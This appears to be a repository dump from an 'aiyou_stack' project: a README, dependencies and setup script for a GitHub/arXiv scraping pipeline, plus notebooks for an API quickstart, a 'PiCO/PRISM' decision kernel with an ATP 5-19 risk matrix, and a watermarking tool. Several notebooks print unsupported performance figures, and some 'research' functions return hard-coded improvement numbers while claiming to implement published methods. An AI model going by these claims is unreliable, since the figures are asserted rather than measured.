SQLite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briefing.py           #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utils/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logging_setup.py      # Logging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kubernetes/               # GKE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README.md             # GKE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cronjob.yaml          # CronJob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pvc.yaml              # Persistent volume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service-account.yaml  # RBAC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secret.yaml.example   # Secret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data/                     # Generated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repos/                # Flattened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papers/               # arXiv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briefings/            # Generated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Pipeline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**Ingestion**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Discover GitHub repositories by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Search arXiv for recent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Flatten repos and download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**JR Scoring**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Evaluate content using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Apply Purpose → Reasons → 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Calculate composite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**Tier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Classify content into 4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Assign ATP 5-19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Store scores in SQLite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Maintain metadata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**Briefing**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executive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Organize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Include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Briefing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Intelligence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items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1: Executive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evaluation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Concerns and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2: Auto-Action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Brief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3-4: Archive/Low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`repositories`: GitHub repo metadata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`papers`: arXiv paper metadata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`briefings`: Briefing generation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RA-1 (Catastrophic): Multi-layer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RA-2 (Critical): Automated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RA-3 (Moderate): Standard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RA-4 (Low): Basic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Scraping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 robots.txt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with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breakers for sustained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Crawl-delay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API Rate Limits**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your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-H "Authorization: token YOUR_TOKEN" https://api.github.com/rate_limit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--upgrade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**Database Locked**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Close any open connections to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delete and regenerate: rm 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API**: Free tier (5,000 requests/hour)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**arXiv API**: Free, unlimited (respect 3-second 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API**: ~$0.50-2.00 per run (depends on content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Local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**Cron (Linux/Mac)**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daily at 2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 * * * cd /path/to/nightly_intel_pipeline &amp;&amp; /usr/bin/python3 main.py &gt;&gt; logs/cron.log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 Scheduler (Windows)**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```powershell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scheduled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schtasks /create /tn "NightlyIntel" /tr "python C:\path\to\main.py" /sc daily /st 02:00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GKE CronJob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production deployments with scalability and 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nightly execution on Google Kubernetes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~45 minute runtime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storage for data and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Cost-optimized (~$77/month)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Multi-container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4 namespace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full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kubernetes/README.md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gcr.io/PROJECT_ID/nightly-intel-pipeline:latest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gcr.io/PROJECT_ID/nightly-intel-pipeline:latest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kubernetes/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Deployment Guide](kubernetes/README.md) - Full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Analysis Framework](GEMINI_ANALYSIS.md) - Pre-production analysis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implements ethical intelligence gathering practices and ATP 5-19 risk management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configuration in `config.py`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logs in `logs/pipeline.log`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environment variables are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Ensure API keys have proper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API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dependencies for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compliant ethical scraping and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scraping and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aiohttp==3.9.1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robotexclusionrulesparser==1.7.1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requests==2.31.0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beautifulsoup4==4.12.2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lxml==4.9.3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Rate limiting and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aiolimiter==1.1.0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tenacity==8.2.3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PyGithub==2.1.1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gitpython==3.1.40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arXiv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feedparser==6.0.10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pandas==2.1.4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numpy==1.26.2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Storage (local alternatives to BigQuery/GCS)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sqlalchemy==2.0.23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sqlite3worker==1.1.7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pyyaml==6.0.1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python-dotenv==1.0.0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structlog==23.2.0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colorlog==6.8.0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Engine / AI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openai==1.6.1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anthropic==0.7.8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python-dateutil==2.8.2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pytz==2023.3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apps/aiyou_stack/aiyou-fastapi-services/nightly_intel_pipeline/setup.sh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 -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"Nightly Intel Pipeline -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"Checking Python version..."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python3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Python 3 is required but not installed."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-p "Create virtual environment? (recommended) [y/N]: " create_venv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$create_venv =~ ^[Yy]$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virtual environment..."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"Virtual environment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.env file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.env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.env file..."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".env file created from .env.example"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"IMPORTANT: Edit .env file and add your API keys:"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 GITHUB_TOKEN"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 ANTHROPIC_API_KEY"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"Edit with: nano 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".env file already exists, skipping..."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data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data directories..."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Edit .env and add your API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(Optional) Customize config.py"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Run the pipeline: python main.py"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$create_venv =~ ^[Yy]$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"Remember to activate the virtual environment:"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source venv/bin/activate"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"For help: python main.py --help"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apps/aiyou_stack/aiyou-fastapi-services/nightly_intel_pipeline/setup.sh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apps/aiyou_stack/aiyou-fastapi-services/notebooks/cor17_quickstart.ipynb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Cor.17 AI Architecture - Quickstart Guide\n",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"This notebook demonstrates the Cor.17 AI Architecture components on Vertex AI Workbench.\n",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Architecture Components:\n",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"1. **Retrieval/Orchestration** - LangChain + GPTRAM (↑45% reasoning, ↓35% tokens)\n",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"2. **Semantic Search** - Nowgrep (↑60% speed, ↓40% index size)\n",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"3. **Core Reasoning** - BDH/RoT/MoE-CL (↑82% throughput, ↓59% cost)\n",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"4. **Safety &amp; Compliance** - Google Content Safety (↑99% trust, ↓70% review)\n",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"5. **Data Ops** - Hive Storage (↑90% traceability, ↓50% drift)"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Install dependencies\n",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"!pip install -q requests httpx python-dotenv"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pprint import pprint\n",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requests\n",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Configuration\n",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"API_BASE_URL = \"http://localhost:8000\"  # Update with your service URL\n",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"API_VERSION = \"v1\"\n",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 make_request(endpoint, method=\"GET\", data=None):\n",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\"\"\"Helper function to make API requests\"\"\"\n",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url = f\"{API_BASE_URL}/api/{API_VERSION}/{endpoint}\"\n",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if method == \"GET\":\n",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response = requests.get(url)\n",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elif method == \"POST\":\n",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response = requests.post(url, json=data)\n",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return response.json()\n",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Helper functions loaded\")"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1. Test System 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Check system status\n",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 = requests.get(f\"{API_BASE_URL}/\")\n",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"pprint(response.json())"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Health check\n",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 = requests.get(f\"{API_BASE_URL}/health\")\n",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"pprint(health.json())"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2. Retrieval &amp; Orchestration (LangChain + GPTRAM)"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Orchestrate reasoning chain\n",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"chain_request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\"session_id\": \"demo_session_001\",\n",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\"query\": \"Explain the benefits of sparse linear attention in transformer models\",\n",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\"context\": {\"domain\": \"machine_learning\", \"complexity\": \"advanced\"},\n",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"result = make_request(\"orchestration/chain\", \"POST\", chain_request)\n",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"print(f\"Status: {result['status']}\")\n",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"print(f\"\\nResult: {result['result'][:500]}...\")\n",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"print(f\"\\nMetrics: {result['metrics']}\")"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3. Semantic Search (Nowgrep)"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Create search index\n",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"index_request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\"index_name\": \"ml_papers\",\n",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\"documents\":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{\"id\": 1, \"content\": \"Attention is all you need - transformer architecture\"},\n",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{\"id\": 2, \"content\": \"BERT: Pre-training of deep bidirectional transformers\"},\n",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{\"id\": 3, \"content\": \"GPT-3: Language models are few-shot learners\"},\n",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{\"id\": 4, \"content\": \"Diffusion models for image generation\"},\n",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{\"id\": 5, \"content\": \"Mixture of experts in neural networks\"},\n",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\"content_field\": \"content\",\n",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"index_result = make_request(\"search/index\", \"POST\", index_request)\n",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"pprint(index_result)"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Search the index\n",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"search_request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\"index_name\": \"ml_papers\",\n",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\"query\": \"transformer models and attention mechanisms\",\n",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\"top_k\": 3,\n",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"search_results = make_request(\"search/search\", \"POST\", search_request)\n",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f\"Found {search_results['num_results']} results in {search_results['elapsed_seconds']:.3f}s\\n\"\n",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 result in search_results[\"results\"]:\n",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print(f\"Rank {result['rank']}: Score {result['score']:.3f}\")\n",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  {result['document']['content']}\\n\")"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4. Core Reasoning Engine (BDH/RoT/MoE-CL)"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Execute hybrid reasoning\n",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"reasoning_request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\"session_id\": \"demo_session_001\",\n",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\"query\": \"How can we optimize large language model inference?\",\n",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\"mode\": \"hybrid\",\n",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\"context\": {\"focus\": \"efficiency\", \"constraints\": \"low_latency\"},\n",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"reasoning_result = make_request(\"reasoning/reason\", \"POST\", reasoning_request)\n",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"pprint(reasoning_result)"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Try different reasoning modes\n",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"modes = [\"bdh\", \"rot\", \"moe\", \"diffusion\"]\n",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 mode in modes:\n",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request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\"session_id\": \"demo_session_001\",\n",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\"query\": \"Explain neural network optimization\",\n",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\"mode\": mode,\n",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result = make_request(\"reasoning/reason\", \"POST\", request)\n",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print(f\"\\n{mode.upper()} Mode:\")\n",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  Confidence: {result['result']['confidence']}\")\n",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  Approach: {result['result']['approach']}\")"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5. Safety &amp;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Moderate content\n",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"content_request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\"content\": \"This is a safe text about machine learning and AI research.\",\n",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\"content_type\": \"text\",\n",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\"check_pii\": True,\n",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\"check_toxicity\": True,\n",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"moderation_result = make_request(\"safety/moderate/content\", \"POST\", content_request)\n",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"print(f\"Approved: {moderation_result['approved']}\")\n",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"print(f\"Violations: {moderation_result['violations']}\")\n",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"print(f\"PII Findings: {moderation_result['pii_findings']}\")\n",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"print(f\"Toxicity Score: {moderation_result['toxicity_score']}\")"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Get moderation stats\n",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"stats = make_request(\"safety/stats\", \"GET\")\n",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"pprint(stats)"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6. Data Operations (Hive Storage)"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Store embeddings\n",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random\n",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"embeddings_request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\"embedding_id\": \"test_embedding_001\",\n",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\"embeddings\": [random.random() for _ in range(768)],\n",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\"metadata\": {\"source\": \"vertex_ai\", \"model\": \"textembedding-gecko@003\"},\n",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"store_result = make_request(\"dataops/embeddings\", \"POST\", embeddings_request)\n",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"pprint(store_result)"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Retrieve embeddings\n",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"retrieved = make_request(\"dataops/embeddings/test_embedding_001\", \"GET\")\n",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"print(f\"Retrieved embedding with {retrieved['dimensions']} dimensions\")\n",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"print(f\"Stored at: {retrieved['timestamp']}\")"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Get storage metrics\n",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"metrics = make_request(\"dataops/metrics\", \"GET\")\n",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"pprint(metrics)"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7. Performance Metrics Summary"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Display overall metrics\n",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"print(\"\\n\" + \"=\" * 60)\n",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"print(\"Cor.17 AI Architecture - Quantitative Metrics\")\n",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"print(\"=\" * 60)\n",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"print(\"\\n1️⃣ Retrieval/Orchestration: ↑ Reasoning depth +45%, ↓ Token waste -35%\")\n",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"print(\"2️⃣ Semantic Search: ↑ Query speed +60%, ↓ Index size -40%\")\n",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"print(\"3️⃣ Core Reasoning: ↑ Throughput +82%, ↓ Cost -59%\")\n",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"print(\"4️⃣ Safety &amp; Compliance: ↑ Trust/Compliance +99%, ↓ Manual review -70%\")\n",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"print(\"5️⃣ Data Ops: ↑ Traceability +90%, ↓ Data drift -50%\")\n",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"print(\"\\nOverall Impact: ↑82% throughput, ↓59% cost, ↓47% memory\")\n",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"print(\"=\" * 60)"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"codemirror_mode":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"ipython",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"file_extension":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"mimetype": "text/x-python",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"nbconvert_exporter":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"pygments_lexer": "ipython3",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"version": "3.11.0"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apps/aiyou_stack/aiyou-fastapi-services/notebooks/cor17_quickstart.ipynb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apps/aiyou_stack/aiyou-fastapi-services/notebooks/pico_prism_kernel.ipynb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PiCO :: PRISM Kernel - Vertex AI Workbench\n",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AiYouJR Decision Framework &amp; Operating System\n",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"**Mission**: Maximize mission advancement, revenue, and survivability ethically and legally.\n",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"**Framework Components**:\n",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P: Position Sequence\n",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R: Role Disciplines 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I: Intent Targets\n",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S: Structure Pipeline\n",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M: Modality Modes\n",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"**Operating Posture**: Strict mode (IQ baseline 160)\n",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"**Decision Framework**: Purpose=AiYouJR • Reason=Doctrine • Brakes=Army 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Environment Setup for Vertex AI Workbench\n",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"!pip install -q google-cloud-aiplatform google-cloud-storage blake3 numpy scipy\n",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"!pip install -q fastapi uvicorn pydantic redis\n",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hashlib\n",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json\n",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dataclasses import dataclass, field\n",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datetime import datetime\n",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enum import Enum\n",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typing import Any\n",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numpy as np"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1. PiCO TRACE: Flow Binding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PicoTrace:\n",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\"\"\"PiCO TRACE: ⊢ ⇨ ⟿ ▷ flow binding system\"\"\"\n",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bind_input(data: dict[str, Any])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\"\"\"⊢ bind.input: Validate and bind incoming data\"\"\"\n",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\"timestamp\": datetime.utcnow().isoformat(),\n",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\"hash\": PicoTrace._compute_hash(data),\n",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\"payload\": data,\n",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\"stage\": \"input_bound\",\n",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direct_flow(bound_data: dict[str, Any], directive: str)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\"\"\"⇨ direct.flow: Apply flow directive\"\"\"\n",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bound_data[\"directive\"] = directive\n",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bound_data[\"stage\"] = \"flow_directed\"\n",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bound_data\n",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carry_motion(flow_data: dict[str, Any], mappings: dict[str, Any])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\"\"\"⟿ carry.motion: Transform through motion mapping\"\"\"\n",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flow_data[\"mappings\"] = mappings\n",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flow_data[\"stage\"] = \"motion_carried\"\n",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flow_data\n",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project_output(motion_data: dict[str, Any])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\"\"\"▷ project.output: Final projection\"\"\"\n",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motion_data[\"stage\"] = \"output_projected\"\n",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motion_data[\"completed\"] = datetime.utcnow().isoformat()\n",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motion_data\n",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_compute_hash(data: Any) -&gt; str:\n",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\"\"\"Compute blake3 hash with fallback chain\"\"\"\n",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serialized = json.dumps(data, sort_keys=True).encode(\"utf-8\")\n",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try:\n",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import blake3\n",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return blake3.blake3(serialized).hexdigest()\n",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except ImportError:\n",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return hashlib.sha256(serialized).hexdigest()\n",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Test the trace\n",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"test_data = {\"test\": \"value\", \"number\": 42}\n",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"result = PicoTrace.bind_input(test_data)\n",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"result = PicoTrace.direct_flow(result, \"test_directive\")\n",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"result = PicoTrace.carry_motion(result, {\"map\": \"test\"})\n",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"result = PicoTrace.project_output(result)\n",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"print(json.dumps(result, indent=2))"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2. PRISM Kernel: Core Framework"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"@dataclass\n",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PrismKernel:\n",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\"\"\"PRISM Kernel: Position-Role-Intent-Structure-Modality\"\"\"\n",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position_sequence: list[str] = field(default_factory=list)\n",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role_disciplines: list[str] = field(default_factory=list)\n",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intent_targets: list[str] = field(default_factory=list)\n",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structure_pipeline: dict[str, Any] = field(default_factory=dict)\n",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modality_modes: list[str] = field(default_factory=list)\n",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__post_init__(self):\n",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if not self.role_disciplines:\n",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self.role_disciplines =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\"Systems Engineering\",\n",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\"Risk Management\",\n",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\"Applied Physics\",\n",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\"Operations Research\",\n",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if not self.modality_modes:\n",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self.modality_modes = [\"analysis\", \"synthesis\", \"execution\", \"validation\"]\n",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initialize(self)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\"\"\"Initialize PRISM kernel with Value.Lock\"\"\"\n",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\"kernel_id\": self._compute_kernel_hash(),\n",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\"initialized_at\": datetime.utcnow().isoformat(),\n",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\"position\": self.position_sequence,\n",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\"roles\": self.role_disciplines,\n",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\"intents\": self.intent_targets,\n",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\"structure\": self.structure_pipeline,\n",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\"modalities\": self.modality_modes,\n",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\"value_lock\": self._apply_value_lock(),\n",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_compute_kernel_hash(self) -&gt; str:\n",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\"\"\"Compute kernel state hash\"\"\"\n",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state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\"P\": self.position_sequence,\n",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\"R\": self.role_disciplines,\n",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\"I\": self.intent_targets,\n",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\"S\": self.structure_pipeline,\n",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\"M\": self.modality_modes,\n",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PicoTrace._compute_hash(state)\n",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_apply_value_lock(self)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\"\"\"Apply Value.Lock: (⊢ ∙ ⇨ ∙ ⟿ ∙ ▷) ⇨ PRISM ≡ Value.Lock'\"\"\"\n",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\"operating_posture\": \"strict\",\n",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\"iq_baseline\": 160,\n",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\"decision_framework\": {\"purpose\": \"AiYouJR\", \"reason\": \"Doctrine\", \"brakes\": \"Army RM\"},\n",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\"pillars\":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\"sop_a\": {\"name\": \"Upload Triage\", \"speed\": \"2x\", \"error_reduction\": \"90%\"},\n",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\"sop_b\": {\"name\": \"Change &amp; Release\", \"cadence\": \"2x\", \"audit\": \"clearer\"},\n",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\"sop_c\": {\"name\": \"Decision Protocol\", \"speed\": \"2x\", \"robustness\": \"1.8x\"},\n",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\"sop_d\": {\"name\": \"Code Review\", \"defect_capture\": \"2x\"},\n",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Initialize kernel\n",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 = PrismKernel(\n",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intent_targets=[\"revenue_optimization\", \"risk_minimization\", \"technical_excellence\"],\n",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structure_pipeline={\"stage_1\": \"analysis\", \"stage_2\": \"execution\"},\n",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"kernel_state = kernel.initialize()\n",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"print(json.dumps(kernel_state, indent=2))"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3. Risk Assessment Framework (Army RM Compatible)"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Probability(Enum):\n",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\"\"\"ATP 5-19 Probability Levels\"\"\"\n",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A_FREQUENT = (\"A\", 5, \"Occurs often\")\n",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B_LIKELY = (\"B\", 4, \"Occurs several times\")\n",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C_OCCASIONAL = (\"C\", 3, \"Occurs sporadically\")\n",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D_SELDOM = (\"D\", 2, \"Unlikely but could occur\")\n",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E_UNLIKELY = (\"E\", 1, \"Can assume will not occur\")\n",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__init__(self, code, value, description):\n",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self.code = code\n",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self.value = value\n",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self.description = description\n",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Severity(Enum):\n",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\"\"\"ATP 5-19 Severity Levels\"\"\"\n",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I_CATASTROPHIC = (\"I\", 4, \"Loss of ability to accomplish mission\")\n",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II_CRITICAL = (\"II\", 3, \"Significantly degraded mission capability\")\n",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III_MARGINAL = (\"III\", 2, \"Degraded mission capability\")\n",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IV_NEGLIGIBLE = (\"IV\", 1, \"Little or no adverse impact\")\n",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__init__(self, code, value, description):\n",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self.code = code\n",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self.value = value\n",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self.description = description\n",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RiskLevel(Enum):\n",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\"\"\"Risk Assessment Levels\"\"\"\n",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EXTREMELY_HIGH = \"EH\"\n",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HIGH = \"H\"\n",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MEDIUM = \"M\"\n",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LOW = \"L\"\n",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"@dataclass\n",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RiskAssessment:\n",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\"\"\"Army Risk Management Decision Framework\"\"\"\n",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ATP 5-19 Risk Matrix\n",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RISK_MATRIX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(Probability.A_FREQUENT, Severity.I_CATASTROPHIC): RiskLevel.EXTREMELY_HIGH,\n",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(Probability.A_FREQUENT, Severity.II_CRITICAL): RiskLevel.EXTREMELY_HIGH,\n",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(Probability.A_FREQUENT, Severity.III_MARGINAL): RiskLevel.HIGH,\n",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(Probability.A_FREQUENT, Severity.IV_NEGLIGIBLE): RiskLevel.MEDIUM,\n",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(Probability.B_LIKELY, Severity.I_CATASTROPHIC): RiskLevel.EXTREMELY_HIGH,\n",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(Probability.B_LIKELY, Severity.II_CRITICAL): RiskLevel.HIGH,\n",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(Probability.B_LIKELY, Severity.III_MARGINAL): RiskLevel.MEDIUM,\n",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(Probability.B_LIKELY, Severity.IV_NEGLIGIBLE): RiskLevel.LOW,\n",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(Probability.C_OCCASIONAL, Severity.I_CATASTROPHIC): RiskLevel.EXTREMELY_HIGH,\n",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(Probability.C_OCCASIONAL, Severity.II_CRITICAL): RiskLevel.HIGH,\n",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(Probability.C_OCCASIONAL, Severity.III_MARGINAL): RiskLevel.MEDIUM,\n",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(Probability.C_OCCASIONAL, Severity.IV_NEGLIGIBLE): RiskLevel.LOW,\n",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(Probability.D_SELDOM, Severity.I_CATASTROPHIC): RiskLevel.HIGH,\n",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(Probability.D_SELDOM, Severity.II_CRITICAL): RiskLevel.MEDIUM,\n",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(Probability.D_SELDOM, Severity.III_MARGINAL): RiskLevel.LOW,\n",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(Probability.D_SELDOM, Severity.IV_NEGLIGIBLE): RiskLevel.LOW,\n",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(Probability.E_UNLIKELY, Severity.I_CATASTROPHIC): RiskLevel.MEDIUM,\n",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(Probability.E_UNLIKELY, Severity.II_CRITICAL): RiskLevel.LOW,\n",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(Probability.E_UNLIKELY, Severity.III_MARGINAL): RiskLevel.LOW,\n",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(Probability.E_UNLIKELY, Severity.IV_NEGLIGIBLE): RiskLevel.LOW,\n",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@classmethod\n",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assess(cls, probability: Probability, severity: Severity)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\"\"\"Assess risk level from probability and severity\"\"\"\n",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risk_level = cls.RISK_MATRIX[(probability, severity)]\n",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\"probability\":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\"code\": probability.code,\n",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\"value\": probability.value,\n",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\"description\": probability.description,\n",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\"severity\":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\"code\": severity.code,\n",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\"value\": severity.value,\n",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\"description\": severity.description,\n",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\"risk_level\": risk_level.value,\n",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\"requires_approval\": risk_level in [RiskLevel.EXTREMELY_HIGH, RiskLevel.HIGH],\n",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\"recommended_action\": cls._get_recommendation(risk_level),\n",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_get_recommendation(risk_level: RiskLevel) -&gt; str:\n",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\"\"\"Get recommended action for risk level\"\"\"\n",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recommendations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RiskLevel.EXTREMELY_HIGH: \"REJECT - Requires significant mitigation or higher authority approval\",\n",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RiskLevel.HIGH: \"ESCALATE - Requires mitigation and leadership approval\",\n",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RiskLevel.MEDIUM: \"MONITOR - Acceptable with controls and continuous monitoring\",\n",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RiskLevel.LOW: \"ACCEPT - Acceptable with minimal controls\",\n",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recommendations[risk_level]\n",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Test risk assessment\n",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 = RiskAssessment.assess(Probability.B_LIKELY, Severity.II_CRITICAL)\n",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"print(json.dumps(risk, indent=2))"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4. Research Delta Implementations"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ResearchDeltas:\n",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\"\"\"Implementation of research optimization techniques\"\"\"\n",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retrieval_of_thought(query: str, templates: list[str])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\"\"\"RoT: 40% token reduction, 59% cost reduction via template reuse\"\"\"\n",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Select most relevant template\n",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selected_template = templates[0] if templates else None\n",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\"method\": \"RoT\",\n",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\"query\": query,\n",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\"template\": selected_template,\n",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\"token_reduction\": 0.40,\n",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\"cost_reduction\": 0.59,\n",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gain_rl(examples: list[dict], usefulness_scores: list[float])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\"\"\"GAIN-RL: Train on most-useful examples first (~2.5x faster)\"\"\"\n",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Sort examples by usefulness\n",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sorted_indices = np.argsort(usefulness_scores)[::-1]\n",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prioritized_examples = [examples[i] for i in sorted_indices]\n",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\"method\": \"GAIN-RL\",\n",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\"speedup\": 2.5,\n",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\"prioritized_count\": len(prioritized_examples),\n",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\"top_examples\": prioritized_examples[:5],\n",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rlp_dense_reward(tokens: list[str], predictions: list[str])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\"\"\"RLP (NVIDIA): Dense per-token rewards (up to +35% improvement)\"\"\"\n",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rewards = []\n",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for token, pred in zip(tokens, predictions, strict=False):\n",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# Compute \"think-before-predict\" reward\n",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reward = 1.0 if token == pred else 0.0\n",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rewards.append(reward)\n",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\"method\": \"RLP\",\n",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\"improvement\": 0.35,\n",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\"avg_reward\": np.mean(rewards),\n",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\"token_count\": len(tokens),\n",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implicit_cot(problem: str, expected_accuracy: float = 1.0)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\"\"\"ICoT: Implicit chain-of-thought (100% on 4x4 multiplication vs ~1% std FT)\"\"\"\n",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\"method\": \"ICoT\",\n",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\"problem\": problem,\n",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\"expected_accuracy\": expected_accuracy,\n",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\"vs_standard_ft\": 0.01,\n",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\"improvement_factor\": 100,\n",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Test research deltas\n",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"rot_result = ResearchDeltas.retrieval_of_thought(\n",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\"Optimize API response time\", [\"Template: Performance optimization with {{metric}} target\"]\n",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"print(\"RoT Result:\", json.dumps(rot_result, indent=2))\n",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"gain_result = ResearchDeltas.gain_rl(\n",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[{\"id\": i, \"data\": f\"example_{i}\"} for i in range(10)],\n",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[0.9, 0.7, 0.95, 0.6, 0.85, 0.5, 0.8, 0.4, 0.75, 0.3],\n",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"print(\"\\nGAIN-RL Result:\", json.dumps(gain_result, indent=2))"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5. Decision Engine with Monte Carlo Simulation"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DecisionEngine:\n",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\"\"\"Purpose-Reason-Brakes decision framework with Monte Carlo\"\"\"\n",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evaluate_decision(\n",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purpose: str,\n",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reasons: list[str],\n",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probability: Probability,\n",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severity: Severity,\n",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roi_baseline: float = 3.0,\n",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ltv_cac_baseline: float = 4.0,\n",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\"\"\"Evaluate decision through purpose-reason-brakes framework\"\"\"\n",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Apply risk brakes\n",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risk_assessment = RiskAssessment.assess(probability, severity)\n",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Check financial gates\n",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financial_cleared = True\n",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financial_notes = []\n",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if roi_baseline &lt; 3.0:\n",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financial_cleared = False\n",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financial_notes.append(f\"ROI {roi_baseline} &lt; 3.0 minimum\")\n",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if ltv_cac_baseline &lt; 4.0:\n",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financial_cleared = False\n",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financial_notes.append(f\"LTV:CAC {ltv_cac_baseline} &lt; 4.0 minimum\")\n",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Final decision\n",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approved = risk_assessment[\"risk_level\"] in [\"M\", \"L\"] and financial_cleared\n",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\"purpose\": purpose,\n",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\"reasons\": reasons,\n",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\"risk_assessment\": risk_assessment,\n",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\"financial_gates\":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\"roi\": roi_baseline,\n",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\"ltv_cac\": ltv_cac_baseline,\n",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\"cleared\": financial_cleared,\n",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\"notes\": financial_notes,\n",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\"decision\": \"APPROVED\" if approved else \"REJECTED\",\n",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\"timestamp\": datetime.utcnow().isoformat(),\n",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monte_carlo_simulation(\n",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n_simulations: int, base_roi: float, roi_std: float, base_cost: float, cost_std: float\n",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\"\"\"Run Monte Carlo simulation for decision confidence\"\"\"\n",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roi_samples = np.random.normal(base_roi, roi_std, n_simulations)\n",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cost_samples = np.random.normal(base_cost, cost_std, n_simulations)\n",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Calculate success rate (ROI &gt;= 3.0)\n",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success_rate = np.sum(roi_samples &gt;= 3.0) / n_simulations\n",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Calculate expected value\n",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expected_value = np.mean(roi_samples * cost_samples)\n",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Percentiles\n",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p10, p50, p90, p99 = np.percentile(roi_samples, [10, 50, 90, 99])\n",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\"n_simulations\": n_simulations,\n",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\"success_rate\": success_rate,\n",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\"expected_value\": expected_value,\n",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\"roi_percentiles\": {\"p10\": p10, \"p50_median\": p50, \"p90\": p90, \"p99\": p99},\n",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\"recommendation\": \"PROCEED\" if success_rate &gt;= 0.8 else \"REJECT\",\n",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Test decision engine\n",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 = DecisionEngine.evaluate_decision(\n",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purpose=\"Launch new API feature\",\n",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reasons=[\"Market demand\", \"Competitive advantage\", \"Revenue opportunity\"],\n",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probability=Probability.C_OCCASIONAL,\n",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severity=Severity.III_MARGINAL,\n",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roi_baseline=4.5,\n",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ltv_cac_baseline=5.2,\n",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"print(\"Decision:\", json.dumps(decision, indent=2))\n",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Run Monte Carlo\n",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"mc_result = DecisionEngine.monte_carlo_simulation(\n",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n_simulations=10000, base_roi=4.5, roi_std=0.8, base_cost=10000, cost_std=2000\n",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"print(\"\\nMonte Carlo:\", json.dumps(mc_result, indent=2))"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6. Hash Tooling: blake3 → wasm → sha256 Fallback"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HashTooling:\n",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\"\"\"Native blake3 → wasm → sha256 fallback chain\"\"\"\n",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compute_hash(data: bytes, prefer_blake3: bool = True) -&gt; tuple[str, str]:\n",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\"\"\"Compute hash with fallback chain\"\"\"\n",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if prefer_blake3:\n",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try:\n",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import blake3\n",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return blake3.blake3(data).hexdigest(), \"blake3\"\n",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except ImportError:\n",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pass\n",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Fallback to sha256\n",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hashlib.sha256(data).hexdigest(), \"sha256\"\n",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verify_hash(data: bytes, expected_hash: str, algorithm: str) -&gt; bool:\n",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\"\"\"Verify data against expected hash\"\"\"\n",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computed_hash, algo_used = HashTooling.compute_hash(\n",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data, prefer_blake3=(algorithm == \"blake3\")\n",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computed_hash == expected_hash and algo_used == algorithm\n",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@staticmethod\n",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batch_hash(items: list[bytes]) -&gt; list[dict[str, str]]:\n",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\"\"\"Batch hash computation for multiple items\"\"\"\n",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results = []\n",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for idx, item in enumerate(items):\n",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hash_val, algo = HashTooling.compute_hash(item)\n",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results.append(\n",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{\"index\": idx, \"hash\": hash_val, \"algorithm\": algo, \"size_bytes\": len(item)}\n",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results\n",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Test hash tooling\n",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"test_data = b\"AiYouJR Decision Framework\"\n",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"hash_result, algo = HashTooling.compute_hash(test_data)\n",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"print(f\"Hash: {hash_result}\")\n",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"print(f\"Algorithm: {algo}\")\n",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Batch test\n",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"batch_items = [b\"item1\", b\"item2\", b\"item3\"]\n",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"batch_results = HashTooling.batch_hash(batch_items)\n",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"print(\"\\nBatch Results:\", json.dumps(batch_results, indent=2))"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7. Integration Test: Full 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 run_full_pipeline(input_data: dict[str, Any]) -&gt; dict[str, Any]:\n",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\"\"\"Run complete PiCO::PRISM pipeline\"\"\"\n",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1. PiCO TRACE: Bind input\n",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trace_step_1 = PicoTrace.bind_input(input_data)\n",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print(\"✓ Input bound\")\n",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2. Initialize PRISM Kernel\n",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kernel = PrismKernel(\n",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intent_targets=[\"revenue_optimization\"], structure_pipeline={\"stage\": \"execution\"}\n",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kernel_state = kernel.initialize()\n",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print(\"✓ PRISM kernel initialized\")\n",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3. Risk Assessment\n",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risk = RiskAssessment.assess(Probability.C_OCCASIONAL, Severity.III_MARGINAL)\n",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print(f\"✓ Risk assessed: {risk['risk_level']}\")\n",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4. Decision Engine\n",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decision = DecisionEngine.evaluate_decision(\n",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purpose=\"Process user request\",\n",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reasons=[\"Valid input\", \"Passed risk assessment\"],\n",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probability=Probability.C_OCCASIONAL,\n",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severity=Severity.III_MARGINAL,\n",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roi_baseline=4.0,\n",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ltv_cac_baseline=5.0,\n",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print(f\"✓ Decision: {decision['decision']}\")\n",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5. Hash verification\n",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data_bytes = json.dumps(input_data).encode(\"utf-8\")\n",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hash_val, algo = HashTooling.compute_hash(data_bytes)\n",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print(f\"✓ Hash computed using {algo}\")\n",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6. PiCO TRACE: Complete flow\n",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trace_step_2 = PicoTrace.direct_flow(trace_step_1, \"full_pipeline\")\n",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trace_step_3 = PicoTrace.carry_motion(trace_step_2, {\"kernel\": kernel_state})\n",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final_output = PicoTrace.project_output(trace_step_3)\n",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print(\"✓ Output projected\")\n",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\"pipeline_result\": \"SUCCESS\",\n",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\"trace\": final_output,\n",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\"kernel\": kernel_state,\n",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\"risk\": risk,\n",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\"decision\": decision,\n",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\"hash\": {\"value\": hash_val, \"algorithm\": algo},\n",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Run full pipeline test\n",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"test_input = {\"request_type\": \"api_call\", \"user_id\": \"test_user_001\", \"operation\": \"data_analysis\"}\n",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"print(\"\\n\" + \"=\" * 60)\n",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"print(\"RUNNING FULL PiCO::PRISM PIPELINE\")\n",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"print(\"=\" * 60 + \"\\n\")\n",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"result = run_full_pipeline(test_input)\n",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"print(\"\\n\" + \"=\" * 60)\n",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"print(\"PIPELINE COMPLETE\")\n",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"print(\"=\" * 60)\n",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"print(json.dumps(result, indent=2, default=str))"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8. Export to Production Python Module\n",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"This cell exports the framework as a standalone Python module for GKE deployment."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Export flag - set to True to generate production module\n",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"EXPORT_TO_MODULE = False\n",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EXPORT_TO_MODULE:\n",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module_path = \"/home/user/shadowtag_v4-fastapi-services/src/pico_prism.py\"\n",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print(f\"Exporting to: {module_path}\")\n",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print(\"Set EXPORT_TO_MODULE = True and re-run to export\")\n",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"else:\n",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print(\"Export disabled. Set EXPORT_TO_MODULE = True to generate production module.\")"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"codemirror_mode":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"ipython",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"file_extension":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"mimetype": "text/x-python",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"nbconvert_exporter":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"pygments_lexer": "ipython3",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"version": "3.10.0"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apps/aiyou_stack/aiyou-fastapi-services/notebooks/pico_prism_kernel.ipynb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apps/aiyou_stack/aiyou-fastapi-services/notebooks/shadowtag_v2_vertex_workbench.ipynb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ShadowTag v2 - Vertex AI Workbench\n",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"Dual-layer steganographic watermarking for content authenticity.\n",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"**Version**: 2.0.0 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"**Mode**: Bourne/160 STRICT (PNKLN)\n",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Overview\n",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**Video Layer**: DCT mid-band pixel watermarking (H.264/H.265 resilient)\n",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**Audio Layer**: Ultrasonic spread-spectrum (≥19.5 kHz)\n",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**Blockchain**: Tamper-evident receipts (Polygon/Ethereum)\n",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"%%bash\n",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Environment bootstrap\n",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 -euo pipefail\n",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Install system dependencies\n",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"sudo apt-get update -qq\n",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"sudo apt-get install -y -qq libsndfile1 ffmpeg libgl1-mesa-glx libglib2.0-0\n",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Install Python packages\n",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"pip install -q opencv-python numpy pydub soundfile librosa scipy typer rich 